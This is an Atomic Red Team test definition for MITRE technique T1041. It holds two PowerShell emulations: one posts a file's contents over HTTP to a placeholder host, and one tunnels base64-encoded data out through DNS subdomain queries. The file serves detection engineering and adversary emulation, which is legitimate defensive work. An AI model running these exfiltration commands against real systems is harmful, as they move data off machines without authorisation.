a5a1cf78fb
* Update T1041.yaml DNS-Based C2 Data Exfiltration Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel. * Update T1041.yaml updated the changes as requested --------- Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
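# Atomic Red Team technique file for T1041 (Exfiltration Over C2 Channel).
# Each entry under atomic_tests is one runnable emulation. The `#{name}` tokens in
# executor.command are replaced with the matching input_arguments value (its
# `default` unless overridden at run time) before the command is executed.
attack_technique: T1041
display_name: 'Exfiltration Over C2 Channel'
atomic_tests:
# Test 1: HTTP POST of a local file's contents to a configurable URL.
- name: C2 Data Exfiltration
  auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932
  description: |
    Exfiltrates a file present on the victim machine to the C2 server.
  supported_platforms:
  - windows
  input_arguments:
    destination_url:
      description: Destination URL to post encoded data.
      type: string
      # RFC 2606 reserved name. The POST is sent to whatever this resolves to, so
      # override it with a host you control when validating detections.
      default: example.com
    filepath:
      description: The file which is being exfiltrated to the C2 Server.
      type: path
      # The command creates this file (100 numbered lines) when it does not exist.
      default: $env:TEMP\LineNumbers.txt
  executor:
    # Observable: a PowerShell-originated HTTP POST whose body is the file content
    # returned by Get-Content. Despite the "encoded" wording in destination_url's
    # description, no explicit encoding is applied to the body in this command.
    # The #{filepath} substitutions are unquoted, so a path containing spaces would
    # break Test-Path/Add-Content/Get-Content; the default contains none.
    command: |
      if(-not (Test-Path #{filepath})){
        1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
      }
      [System.Net.ServicePointManager]::Expect100Continue = $false
      $filecontent = Get-Content -Path #{filepath}
      Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
    name: powershell

# Test 2: DNS tunnelling emulation. The base64 form of exfiltrated_data is split
# into pieces of chunk_size characters and each piece is looked up as
# <chunk>.<dns_server>.
- name: Text Based Data Exfiltration using DNS subdomains
  auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9
  description: |
    Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
  supported_platforms:
  - windows
  input_arguments:
    dns_server:
      description: DNS server IP address or domain name.
      # This value is the parent domain of each query, not the resolver: Resolve-DnsName
      # is called without -Server, so lookups go through the host's configured resolver.
      # `type: url` does not match the "IP address or domain name" description; `string`
      # would describe it better.
      type: url
      default: dns.example.com
    exfiltrated_data:
      description: Data to be exfiltrated.
      type: string
      default: SecretDataToExfiltrate
    chunk_size:
      description: Size of each DNS query chunk (in characters).
      type: integer
      # 63 is the maximum length of a single DNS label (RFC 1035).
      default: 63
  executor:
    # Observable: a burst of Resolve-DnsName lookups, 5 seconds apart, whose leftmost
    # label is a base64 fragment of up to chunk_size characters under dns_server.
    # Test artifacts to expect in the output: -split with a capturing group also
    # returns the empty strings between matches, so some iterations query
    # ".<dns_server>" and Resolve-DnsName reports an error; base64 '+', '/' and '='
    # are not valid hostname characters, so those names may be rejected as well.
    # Whether rejected names reach the wire depends on the client resolver — confirm
    # against DNS client event logs when building a detection.
    command: |
      $dnsServer = "#{dns_server}"
      $exfiltratedData = "#{exfiltrated_data}"
      $chunkSize = #{chunk_size}

      $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
      $encodedData = [Convert]::ToBase64String($encodedData)
      $chunks = $encodedData -split "(.{$chunkSize})"

      foreach ($chunk in $chunks) {
        $dnsQuery = $chunk + "." + $dnsServer
        Resolve-DnsName -Name $dnsQuery
        Start-Sleep -Seconds 5
      }
    name: powershell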